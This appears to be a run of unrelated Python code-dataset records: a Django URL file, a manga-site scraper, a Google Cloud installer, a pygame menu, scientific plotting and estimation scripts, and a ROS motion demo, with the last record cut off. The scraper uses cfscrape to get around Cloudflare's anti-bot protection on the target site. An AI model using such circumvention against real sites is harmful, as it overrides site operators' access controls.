url(r'^i1/',view.register),\n\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"act_complementaryMedicine/act_complementaryMedicine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"137749522","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom lxml.html import document_fromstring\nimport re\nimport cfscrape\nfrom helpers.exceptions import UrlParseError\n\ndomainUri = 'http://www3.mangafreak.net'\n\n\ndef get_main_content(url, get=None, post=None):\n if not cookies:\n get_manga_name(url)\n _ = '{}/Manga/{}'.format(domainUri, get_manga_name(url))\n return get(_)\n\n\ndef get_volumes(content=None, url=None, get=None, post=None):\n return []\n\n\ndef get_archive_name(volume, index: int = None):\n return ''\n\n\ndef get_images(main_content=None, volume=None, get=None, post=None):\n return []\n\n\ndef get_manga_name(url, get=None):\n # http://www3.mangafreak.net/Manga/Onepunch_Man\n # http://www3.mangafreak.net/Read1_Onepunch_Man_1\n\n global cookies\n\n if not cookies:\n # anti-\"cloudflare anti-bot protection\"\n with cfscrape.get_tokens(url) as scraper:\n if scraper is not None:\n cookies = []\n for i in scraper[0]:\n cookies.append({\n 'value': scraper[0][i],\n 'domain': '.mangafreak.net',\n 'path': '/',\n 'name': i,\n })\n cookies.append(scraper[1])\n\n test = re.search('/Manga/([^/]+)/?', url)\n if test:\n return test.groups()[0]\n test = re.search('/Read\\d+_(.+)_\\d+', url)\n if test:\n return test.groups()[0]\n raise UrlParseError()\n\n\ndownload_zip_only = True\n\n\ndef get_zip(main_content=None, volume=None, get=None, post=None):\n links = document_fromstring(main_content).cssselect('.manga_series_list a[download]')\n return [i.get('href') for i in links]\n\n\ncookies = 
None\n","sub_path":"providers/mangafreak_net.py","file_name":"mangafreak_net.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"527101784","text":"#!/usr/bin/env python3\nfrom enum import Enum\nimport time\nimport subprocess\nimport os\nimport sys\n\n\nclass Color(Enum):\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n ORANGE = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef text_color(text, color, space_before=True):\n return '{space}{color}{text}{end}'.format(space='\\n' if space_before else '', color=color.value, text=text, end='\\033[0m')\n\n\ndef abort():\n print(text_color('Deployment canceled.', Color.RED))\n sys.exit(0)\n\n\nif __name__ == '__main__':\n print(text_color('┌────────────────────────────────────────────────┐', Color.HEADER, space_before=False))\n print(text_color('�� Welcome to Data Quality Manager GCP installer! │', Color.HEADER, space_before=False))\n print(text_color('└────────────────────────────────────────────────┘', Color.HEADER, space_before=False))\n\n project_id = subprocess.check_output(['gcloud', 'config', 'list', '--format', 'value(core.project)']).decode('utf-8').replace('\\n','')\n\n prompt = input(text_color('You are about to deploy DQM within GCP project \"{}\", continue? (Y/n) '.format(project_id), Color.BOLD))\n if prompt.lower() == 'n':\n abort()\n\n print(text_color('Downloading sources...', Color.BLUE))\n subprocess.check_output(['git', 'clone', 'https://github.com/google/dqm.git'])\n\n print(text_color('Installing frontend dependencies...', Color.BLUE))\n subprocess.check_output(['npm', 'install'], cwd='dqm/frontend')\n\n print(text_color('Building frontend (it can take a little while)...', Color.BLUE))\n subprocess.check_output(['npm', 'run', 'build'], cwd='dqm/frontend')\n\n print(text_color('Installing pipenv...', Color.BLUE))\n subprocess.check_output(['pip3', 'install', '--user', 'pipenv'])\n\n print(text_color('Installing Python libs...', Color.BLUE))\n subprocess.check_output(['python3', '-m', 'pipenv', 'install', '--dev'], cwd='dqm/backend')\n\n print(text_color('Enabling APIs...', Color.BLUE))\n subprocess.check_output(['gcloud', 'services', 'enable', 'analytics.googleapis.com'])\n subprocess.check_output(['gcloud', 'services', 'enable', 'analyticsreporting.googleapis.com'])\n\n print(text_color('Creating App Engine application...', Color.BLUE))\n try:\n subprocess.check_output(['gcloud', 'app', 'create'])\n except subprocess.CalledProcessError as e:\n print(text_color('Failed to create App Engine app (this is normal if you have an existing app).', Color.ORANGE))\n prompt = input(text_color('Continue anyway and deploy on existing app? (Y/n) ', Color.BOLD))\n if prompt.lower() == 'n':\n abort()\n\n print(text_color('Getting service account key...', Color.BLUE))\n subprocess.check_output(['gcloud', 'iam', 'service-accounts', 'keys', 'create', './key.json', '--iam-account', f'{project_id}@appspot.gserviceaccount.com'], cwd='dqm/backend')\n\n print(text_color('Setting up database...', Color.BLUE))\n\n prompt = input(text_color('Do you want to reuse an existing SQL instance? (y/N) ', Color.BOLD))\n create_sql_instance = True if prompt.lower() != 'y' else False\n sql_instance_name = input(text_color('SQL instance name (dqm)? ', Color.BOLD)) or 'dqm'\n sql_instance_region = input(text_color('SQL instance region (europe-west1)? 
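# [Editor's note] Quick offline check of the two URL shapes that
# get_manga_name() above accepts (regexes copied verbatim from the provider):
import re

for url in ('http://www3.mangafreak.net/Manga/Onepunch_Man',
            'http://www3.mangafreak.net/Read1_Onepunch_Man_1'):
    m = re.search(r'/Manga/([^/]+)/?', url) or re.search(r'/Read\d+_(.+)_\d+', url)
    assert m.groups()[0] == 'Onepunch_Man'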
', Color.BOLD)) or 'europe-west1'\n if create_sql_instance:\n print(text_color('Creating SQL instance (it can take a little while)...', Color.BLUE))\n subprocess.check_output(['gcloud', 'sql', 'instances', 'create', sql_instance_name, '--region={}'.format(sql_instance_region)])\n\n prompt = input(text_color('Do you want to reuse an existing MySQL database? (y/N) ', Color.BOLD))\n create_sql_db = True if prompt.lower() != 'y' else False\n sql_db_name = input(text_color('MySQL database name (dqm)? ', Color.BOLD)) or 'dqm'\n if create_sql_db:\n print(text_color('Creating MySQL database...', Color.BLUE))\n subprocess.check_output(['gcloud', 'sql', 'databases', 'create', sql_db_name, '--instance={}'.format(sql_instance_name)])\n\n prompt = input(text_color('Do you want to reuse an existing MySQL user? (y/N) ', Color.BOLD))\n create_sql_user = True if prompt.lower() != 'y' else False\n sql_user_name = input(text_color('MySQL user name (dqmuser)? ', Color.BOLD)) or 'dqmuser'\n if create_sql_user:\n print(text_color('Creating MySQL user...', Color.BLUE))\n subprocess.check_output(['gcloud', 'sql', 'users', 'create', sql_user_name, '--instance={}'.format(sql_instance_name)])\n\n print(text_color('Connecting to database...', Color.BLUE))\n subprocess.check_output(['wget', 'https://dl.google.com/cloudsql/cloud_sql_proxy.linux.amd64', '-O', 'cloud_sql_proxy'], cwd='dqm/backend')\n subprocess.check_output(['chmod', '+x', 'cloud_sql_proxy'], cwd='dqm/backend')\n connection_name = f'{project_id}:{sql_instance_region}:{sql_instance_name}'\n subprocess.Popen(['./cloud_sql_proxy', f'-instances={connection_name}=tcp:3306'], stdout=subprocess.PIPE, cwd='dqm/backend')\n\n # Wait for database connection to be available...\n time.sleep(4)\n\n print(text_color('Migrating database...', Color.BLUE))\n os.putenv('DQM_CLOUDSQL_CONNECTION_NAME', connection_name)\n os.putenv('DQM_CLOUDSQL_DATABASE', sql_db_name)\n os.putenv('DQM_CLOUDSQL_USER', sql_user_name)\n subprocess.check_output(['python3', '-m', 'pipenv', 'run', 'python', 'manage.py', 'makemigrations'], cwd='dqm/backend')\n subprocess.check_output(['python3', '-m', 'pipenv', 'run', 'python', 'manage.py', 'makemigrations', 'dqm'], cwd='dqm/backend')\n subprocess.check_output(['python3', '-m', 'pipenv', 'run', 'python', 'manage.py', 'migrate'], cwd='dqm/backend')\n\n print(text_color('Generating requirements.txt file...', Color.BLUE))\n with open('dqm/backend/requirements.txt', 'w') as f:\n subprocess.call(['python3', '-m', 'pipenv', 'lock', '--requirements'], cwd='dqm/backend', stdout=f)\n\n print(text_color('Updating app.yaml file...', Color.BLUE))\n with open('dqm/backend/app.yaml') as f:\n content = f.read()\n content = content.replace('DQM_CLOUDSQL_CONNECTION_NAME: \"\"', f'DQM_CLOUDSQL_CONNECTION_NAME: \"{connection_name}\"')\n content = content.replace('DQM_CLOUDSQL_USER: \"dqmuser\"', f'DQM_CLOUDSQL_USER: \"{sql_user_name}\"')\n content = content.replace('DQM_CLOUDSQL_DATABASE: \"dqm\"', f'DQM_CLOUDSQL_DATABASE: \"{sql_db_name}\"')\n\n with open('dqm/backend/app.yaml', 'w') as f:\n f.write(content)\n\n print(text_color('Deploying to App Engine app...', Color.BLUE))\n subprocess.check_output(['gcloud', 'app', 'deploy'], cwd='dqm/backend')\n\n print(text_color('All good, thanks for using DQM :)', Color.GREEN))\n\n","sub_path":"installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":6724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"172220011","text":"import pygame\n\nfrom physics 
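# [Editor's sketch -- not in the original installer.py] The script above calls
# subprocess.check_output() dozens of times; a tiny helper (the name `run` is
# an assumption) would also capture stderr so a failed gcloud step is visible:
import subprocess

def run(cmd, cwd=None):
    """Run a command list, printing captured output if it fails."""
    try:
        return subprocess.check_output(cmd, cwd=cwd, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as exc:
        print(exc.output.decode('utf-8', errors='replace'))
        raise

# run(['gcloud', 'app', 'deploy'], cwd='dqm/backend')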
import *\nfrom settings import *\n\ndef text_format(message, textFont, textSize, textColor):\n newFont=pygame.font.SysFont(textFont, textSize)\n newText=newFont.render(message, 0, textColor)\n\n return newText\n\ndef menu(screen, clock):\n menu=True\n selected=\"start\"\n\n while menu:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit()\n quit()\n if event.type==pygame.KEYDOWN:\n if event.key==pygame.K_UP:\n selected=\"start\"\n elif event.key==pygame.K_DOWN:\n selected=\"quit\"\n if event.key==pygame.K_RETURN:\n if selected==\"start\":\n return\n if selected==\"quit\":\n pygame.quit()\n quit()\n\n # Main Menu UI\n font = \"roboto\"\n screen.fill(BLUE)\n title=text_format(\"Space Create\",font , 90, SILVER)\n if selected==\"start\":\n text_start=text_format(\"START\", font, 75, WHITE)\n else:\n text_start = text_format(\"START\", font, 75, BLACK)\n if selected==\"quit\":\n text_quit=text_format(\"QUIT\", font, 75, WHITE)\n else:\n text_quit = text_format(\"QUIT\",font, 75, BLACK)\n\n title_rect=title.get_rect()\n start_rect=text_start.get_rect()\n quit_rect=text_quit.get_rect()\n\n # Main Menu Text\n screen.blit(title, (WIDTH/2 - (title_rect[2]/2), 80))\n screen.blit(text_start, (WIDTH/2 - (start_rect[2]/2), 300))\n screen.blit(text_quit, (WIDTH/2 - (quit_rect[2]/2), 360))\n pygame.display.update()\n clock.tick(FPS)\n pygame.display.set_caption(\"Python - Pygame Simple Main Menu Selection\")\n","sub_path":"intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271828012","text":"from matplotlib import rc\nrc(\"font\", family=\"serif\", size=12)\n\nimport daft\n\n# Colors\ng_color = {\"ec\": \"#46a546\"}\nh_color = {\"ec\": \"#348ABD\"}\ns_color = {\"ec\": \"#7A68A6\"}\ne_color = {\"ec\": \"#A60628\"} \n\n# Instantiate the PGM.\npgm = daft.PGM([7, 4.7], origin=[0.3, 0.3])\n\n# Hierarchical parameters.\n# Hyper parameters\npgm.add_node(daft.Node(\"alpha_n\", r\"$\\alpha_n$\", 0.75, 2.25, plot_params=e_color, fixed=True))\npgm.add_node(daft.Node(\"beta_n\", r\"$\\beta_n$\", 1.25, 2.25, plot_params=e_color, fixed=True))\n\npgm.add_node(daft.Node(\"alpha_q\", r\"$\\alpha_q$\", 3, 4.25, plot_params=h_color, fixed=True))\npgm.add_node(daft.Node(\"beta_q\", r\"$\\beta_q$\", 3.5, 4.25, plot_params=h_color, fixed=True))\npgm.add_node(daft.Node(\"lambda_q\", r\"$\\lambda_q$\", 2.5, 4.25, plot_params=h_color, fixed=True))\npgm.add_node(daft.Node(\"gamma_q\", r\"$\\gamma_q$\", 2, 4.25, plot_params=h_color, fixed=True))\n\npgm.add_node(daft.Node(\"alpha_g\", r\"$\\alpha_g$\", 5.5, 4.25, plot_params=g_color, fixed=True))\npgm.add_node(daft.Node(\"beta_g\", r\"$\\beta_g$\", 6.5, 4.25, plot_params=g_color, fixed=True))\npgm.add_node(daft.Node(\"lambda_g\", r\"$\\lambda_g$\", 5.5, 2.75, plot_params=g_color, fixed=True))\npgm.add_node(daft.Node(\"gamma_g\", r\"$\\gamma_g$\", 6.5, 2.75, plot_params=g_color, fixed=True))\n\n# Latent variable.\npgm.add_node(daft.Node(\"tau_n\", r\"$\\tau_n$\", 1, 1.5, plot_params=e_color))\n\npgm.add_node(daft.Node(\"tau_q\", r\"$\\tau_q$\", 3.25, 3.5, plot_params=h_color))\npgm.add_node(daft.Node(\"tau_g\", r\"$\\tau_g$\", 6, 3.5, plot_params=g_color))\n\npgm.add_node(daft.Node(\"mu_q\", r\"$\\mu_q$\", 2.25, 3.5, plot_params=h_color))\npgm.add_node(daft.Node(\"mu_g\", r\"$\\mu_g$\", 6, 2, plot_params=g_color))\n\npgm.add_node(daft.Node(\"T\", r\"$T_{hq}$\", 2.75, 2.5, plot_params=h_color))\npgm.add_node(daft.Node(\"B\", 
r\"$B_{gq}$\", 4.5, 2.75, plot_params=g_color))\n\n# Data.\npgm.add_node(daft.Node(\"S\", r\"$S_{hgq}$\", 4.5, 1.5, observed=True, plot_params=s_color))\n\n# Add in the edges.\npgm.add_edge(\"alpha_n\", \"tau_n\")\npgm.add_edge(\"beta_n\", \"tau_n\")\n\npgm.add_edge(\"alpha_q\", \"tau_q\")\npgm.add_edge(\"beta_q\", \"tau_q\")\npgm.add_edge(\"gamma_q\", \"mu_q\")\npgm.add_edge(\"lambda_q\", \"mu_q\")\n\npgm.add_edge(\"alpha_g\", \"tau_g\")\npgm.add_edge(\"beta_g\", \"tau_g\")\npgm.add_edge(\"gamma_g\", \"mu_g\")\npgm.add_edge(\"lambda_g\", \"mu_g\")\n\npgm.add_edge(\"tau_q\", \"T\")\npgm.add_edge(\"tau_q\", \"mu_q\")\n\npgm.add_edge(\"tau_g\", \"B\")\npgm.add_edge(\"tau_g\", \"mu_g\")\n\npgm.add_edge(\"mu_q\", \"T\")\npgm.add_edge(\"mu_g\", \"B\")\n\npgm.add_edge(\"tau_n\", \"S\")\npgm.add_edge(\"T\", \"S\")\npgm.add_edge(\"B\", \"S\")\n\n\n# Add H plate\npgm.add_plate(daft.Plate([1.5, 0.5, 5.5, 4.3], label=r\"$h \\in H$\",\n shift=-0.1))\n\n# Add G plate\npgm.add_plate(daft.Plate([4, 0.6, 2.9, 4.1], label=r\"$g \\in G(h)$\",\n shift=-0.1))\n\n# Add Q plate\npgm.add_plate(daft.Plate([1.6, 1, 3.5, 3.7], label=r\"$q \\in Q(h)$\",\n shift=-0.1))\n\n# Render and save\npgm.render()\npgm.figure.savefig(\"ProposedModel.pdf\")\n","sub_path":"Thesis/figures/Models/ProposedModel.py","file_name":"ProposedModel.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"49575954","text":"#!/usr/bin/env python\nimport sys\nfrom src.annotation import Annotation\n\n#this functions takes an ipr file and returns a list of annotations. 3 types of annotations are retrieved based on the following keys: \"Dbxref\", \"GO\" and \"InterPro\"\n#Note: when pulling data from the input file, we always use \".strip()\" to remove any whitespace padding\n#Note: this algorithm assumes that if the column exists then the supposed type of value is there (e.g. 
if column #11 exists, then it has IPR information)\ndef read_ipr(io_buffer, whitelist=None):\n \"\"\"Returns a list of lists, each containing mrna_id, \"Dbxref\" and annotation.\"\"\"\n ipr_list = []\n for line in io_buffer:\n columns = line.split(\"\\t\") #columns are assumed to be tab-separated\n #if column exists and dbxref is in whitelist (aside from whitespace padding and caps)\n if (len(columns)>3 and (columns[3].strip().lower() in whitelist)) or\\\n (len(columns)>3 and not whitelist): \n ipr_list.append(Annotation(columns[0].strip(), \"Dbxref\", columns[3].strip().upper()+\":\"+columns[4].strip()))\n #if column exists (we don't care about the whitelist for GO annotations)\n if len(columns)>13 and columns[13].find(\"GO:\") != -1: \n ipr_list.append(Annotation(columns[0].strip(), \"Dbxref\", columns[13].strip()))\n #if column exists (we don't care about the whitelist for IPR annotations)\n if len(columns)>11 and columns[11].find(\"IPR\") != -1: \n ipr_list.append(Annotation(columns[0].strip(), \"Dbxref\", \"InterPro:\"+columns[11].strip()))\n\n #this alg removes duplicates\n ipr_list = sorted(ipr_list)\n ipr_list = [ipr_list[i] for i in range(len(ipr_list)) if i== 0 or ipr_list[i] != ipr_list[i-1]]\n\n return ipr_list\n","sub_path":"src/ipr.py","file_name":"ipr.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"233992036","text":"import os\nimport ovito\nfrom ovito.anim import *\nfrom ovito.data import *\nfrom ovito.io import import_file\nfrom ovito.modifiers import *\nfrom ovito.vis import *\n\nimport sys\n\ninfile = str(sys.argv[1])\nflip = int(sys.argv[2])\ndpi = int(sys.argv[3])\noutfile, file_extension = os.path.splitext(infile) # get base name\n\nnode = import_file(infile, multiple_frames = True) # load file as trajectory\nnode.add_to_scene()\n\na = 0\nfinal = node.source.num_frames - 1 # index of last frame\n\n# Particle colors\nr_tel = 0.294\ng_tel = 0.654\nb_tel = 0.611\n\nr_orn = 0.807\ng_orn = 0.650\nb_orn = 0.321\n\n# made this a while loop so that I could handle exceptions\nwhile a == 0:\n # White background\n rs = RenderSettings(\n filename = outfile + \".png\",\n size = (dpi, dpi),\n background_color = (1.0, 1.0, 1.0),\n renderer = OpenGLRenderer()\n ) # settings for render\n\n ovito.dataset.anim.current_frame = final # grab final snapshot\n vp = ovito.dataset.viewports.active_vp\n \n # Flip the color scheme A to orange, B to teal\n if flip:\n node.modifiers.append(SelectParticleTypeModifier(property='Particle Type',\n types={0}))\n node.modifiers.append(AssignColorModifier(color=(r_tel, g_tel, b_tel)))\n\n # catch any corrupted data errors\n try:\n node.compute() # set color of type A\n a = 1\n except Exception:\n final -= 1\n a = 0\n\n # Flip the color scheme A: teal, B: orange\n if flip:\n node.modifiers.append(SelectParticleTypeModifier(property='Particle Type',\n types={1}))\n node.modifiers.append(AssignColorModifier(color=(r_orn, g_orn, b_orn)))\n\n # this block will only run if we haven't thrown an exception\n if a == 1:\n node.compute() # set color of type B\n vp.type = Viewport.Type.TOP # top view\n vp.zoom_all() # zoom to fit\n vp.render(rs) # render image\n","sub_path":"simulation_camera/png_final_tstep.py","file_name":"png_final_tstep.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"327541180","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 
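# [Editor's sketch -- not in the original ipr.py] Offline illustration of the
# column handling in read_ipr() above, using plain tuples instead of the
# Annotation class (the sample row is made up for illustration):
import io

row = "mrna1\tx\ty\tPFAM\tPF00001\t.\t.\t.\t.\t.\t.\tIPR000001\t.\tGO:0005524\n"
for line in io.StringIO(row):
    cols = line.split("\t")
    annots = set()   # a set deduplicates, like the sort-and-filter step above
    if len(cols) > 3 and cols[3].strip().lower() in {"pfam"}:      # whitelist
        annots.add((cols[0], "Dbxref", cols[3].strip().upper() + ":" + cols[4].strip()))
    if len(cols) > 13 and "GO:" in cols[13]:
        annots.add((cols[0], "Dbxref", cols[13].strip()))
    if len(cols) > 11 and "IPR" in cols[11]:
        annots.add((cols[0], "Dbxref", "InterPro:" + cols[11].strip()))
    print(sorted(annots))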
22:39:58 2017\n\n@author: pschl\n\"\"\"\n\nfrom apm import *\nimport matplotlib.pyplot as plt\n\ns = 'http://byu.apmonitor.com'\na = 'schleede'\n\napm(s,a,'clear all')\napm_load(s,a,'p3.apm')\ncsv_load(s,a,'p3.csv')\n\n#Kf and Kb are FVs so they can be manipulated by the MHE\napm_info(s,a,'FV','Kf')\napm_info(s,a,'FV','Kb')\napm_option(s,a,'Kf.status',1)\napm_option(s,a,'Kf.fstatus',0)\napm_option(s,a,'Kb.status',1)\napm_option(s,a,'Kb.fstatus',0)\n#dcost\n\n#Ca,Cb,Cd are SVs because they are of interest but we have no data of them\napm_info(s,a,'SV','Ca')\napm_info(s,a,'SV','Cb')\napm_info(s,a,'SV','Cd')\n#TUNE SVS HERE\n\n#Cc is a CV because it has data and we want to fit to it\napm_info(s,a,'CV','Cc')\napm_option(s,a,'Cc.status',0)\napm_option(s,a,'Cc.fstatus',1)\n\n#Solution stuff\napm_option(s,a,'nlc.nodes',3)\napm_option(s,a,'nlc.solver',1)\napm_option(s,a,'nlc.imode',5)\n#apm_option(s,a,'nlc.mv_type',1)\napm_option(s,a,'nlc.ev_type',1)\napm_option(s,a,'nlc.sensitivity',1)\n\noutput = apm(s,a,'solve')\nprint(output)\n\ny = apm_sol(s,a)\n\napm_web(s,a)\n\nprint('Kf = ' + str(y['kf'][-1]))\nprint('Kb = ' + str(y['kb'][-1]))\n\ntime = [0,5,10,20,30,40,50,60,90,120,150,180,240,300,360,480,600,720]\nCc_meas = [0,.57,.78,.92,1.04,1.19,1.29,1.36,1.59,1.68,1.84,1.96,2.01,2.13,2.21,5.32,2.38,2.44]\n\ntime_rm = [0,5,10,20,30,40,50,60,90,120,150,180,240,300,360,360,600,720]\nCc_meas_rm = [0,.57,.78,.92,1.04,1.19,1.29,1.36,1.59,1.68,1.84,1.96,2.01,2.13,2.21,2.21,2.38,2.44]\n\nplt.figure(1)\nplt.plot(time,Cc_meas, label='Measured Cc')\nplt.plot(y['time'],y['cc'],label='Model Cc')\nplt.plot(time, Cc_meas_rm,label='Measured Cc with no Outlier')\nplt.xlabel('time')\nplt.ylabel('concentration')\nplt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n\nplt.figure(2)\nplt.plot(y['time'],y['ca'],label='Model Ca')\nplt.plot(y['time'],y['cb'],label='Model Cb')\nplt.plot(y['time'],y['cc'],label='Model Cc')\nplt.plot(y['time'],y['cd'],label='Model Cd')\nplt.xlabel('time')\nplt.ylabel('concentration')\nplt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\nplt.show()","sub_path":"Midterm/Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"211172604","text":"#!/usr/bin/env python\n\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2014-2015, Dataspeed Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n# \n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name of Dataspeed Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport rospy\nfrom geometry_msgs.msg import Twist\n\ndef timer_callback(event):\n pub.publish(twist_output)\n\ndef simple_motion(twist, duration):\n global twist_output\n\n opposite_twist = Twist()\n opposite_twist.linear.x = -twist.linear.x\n opposite_twist.linear.y = -twist.linear.y\n opposite_twist.angular.z = -twist.angular.z\n\n if rospy.is_shutdown():\n return\n\n twist_output = twist\n rospy.sleep(duration)\n twist_output = zero_twist\n rospy.sleep(1.0)\n twist_output = opposite_twist\n rospy.sleep(duration)\n twist_output = zero_twist\n rospy.sleep(1.0)\n\ndef motion_demo():\n global pub\n pub = rospy.Publisher('/mobility_base/cmd_vel', Twist, queue_size=1)\n rospy.init_node('motion_demo');\n\n global zero_twist\n zero_twist = Twist()\n zero_twist.linear.x = 0\n zero_twist.linear.y = 0\n zero_twist.angular.z = 0\n\n global twist_output\n twist_output = Twist()\n\n rospy.Timer(rospy.Duration(0.1), timer_callback)\n\n speed = 0.2\n dist = 1 / 3.28\n vel = Twist()\n \n # Rotate\n vel.linear.x = 0\n vel.linear.y = 0\n vel.angular.z = 0.628\n simple_motion(vel, 10.2)\n\n # North\n vel.linear.x = speed\n vel.linear.y = 0\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # North-East\n vel.linear.x = 0.707 * speed\n vel.linear.y = -0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n \n # East\n vel.linear.x = 0\n vel.linear.y = -speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n \n # South-East\n vel.linear.x = -0.707 * speed\n vel.linear.y = -0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # South\n vel.linear.x = -speed\n vel.linear.y = 0\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # South-West\n vel.linear.x = -0.707 * speed\n vel.linear.y = 0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # West\n vel.linear.x = 0\n vel.linear.y = speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # North-West\n vel.linear.x = 0.707 * speed\n vel.linear.y = 0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\nif __name__ == '__main__':\n motion_demo()\n","sub_path":"scripts/motion_demo.py","file_name":"motion_demo.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"361690202","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\nimport matplotlib as mpl\nimport sys\n\n\ndef task(tStep):\n\n\tdir = u\"output_14_supersym\"\n\t# tStep = 5000\n\n\tZ = np.loadtxt(\".\\\\\" + dir + \"\\\\task_9_2dVec_P_tStep=\" + str(tStep) + \".csv\",delimiter=\",\")\n\tZ = Z.T\n\t# print np.max(Z), np.min(Z)\n\tps(np.max(Z))\n\tps(\"\\t\")\n\tps(np.min(Z))\n\tps(\"\\n\")\n\n\tfor i in xrange(len(Z)):\n\t\tfor j in xrange(len(Z[0])):\n\t\t\tif Z[i][j] > 0.6:\n\t\t\t\tZ[i][j] = 0.6\n\t\t\telif Z[i][j] < -0.6:\n\t\t\t\tZ[i][j] = -0.6\n\n\tNX = 401\n\tNY = 201\n\tTstep2T = 1.0/50.0\n\n\tx = np.linspace(-10, 30, NX)\n\ty = np.linspace(-10, 
10, NY)\n\t# print x\n\t# print y\n\tX, Y = np.meshgrid(x, y)\n\n\t# print x\n\t# print y\n\t# exit()\n\n\t# 一括設定\n\t# http://nanyakan.blogspot.jp/2013/03/matplotlib.html\n\tmpl.rcParams['font.family'] = u'Consolas'\n\t# mpl.rcParams['font.size'] = 14\n\t# params = {'font.family': 'Times New Roman'}\n\t# params = {'font.family': 'Consolas'}\n\t# mpl.rcParams.update(params)\n\t# print mpl.rcParams['font.family']\n\n\n\n\t#plt.contour(X, Y, Z)\n\t# plt.contourf(X, Y, Z)\n\t# plt.contourf(X, Y, Z)\n\t# plt.contour(X, Y, Z, 80)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 30, endpoint=False)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 12*2+1)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 15*2+1)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 12*4+1)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 12*4+1)\n\tcolorbarRange = np.linspace(-0.6, 0.6, 12*5+1)\n\t# colorbarRange = np.linspace(-0.3, 0.3, 15*2+1)\n\t# print colorbarRange\n\tplt.contour(X, Y, Z, colorbarRange, colors=\"black\",alpha=0.3, linewidths=0.3, linestyles=\"solid\")\n\tplt.contourf(X, Y, Z, colorbarRange, cmap=plt.cm.jet)\n\n\t# plt.contourf(X, Y, Z, 80, cmap=plt.cm.prism)\n\tcolorbarTics = np.linspace(-0.6, 0.6, 6+1)\n\t# pad: プロットエリアとカラーバーの距離\n\tcb = plt.colorbar(label=\"Pressure\", orientation=\"horizontal\", pad=0.1, ticks=colorbarTics)\n\n\n\n\tax = cb.ax\n\t# font = mpl.font_manager.FontProperties(family='times new roman', style='italic', size=16)\n\tfont = mpl.font_manager.FontProperties(family='Consolas')\n\t# text = ax.yaxis.label\n\ttext = ax.xaxis.label\n\t# text.set_font_properties(font)\n\n\n\t# cb.ax.tick_params(steps=10)\n\t# cb.ax.tick_params(font)\n\t# text = ax.xticks\n\t# 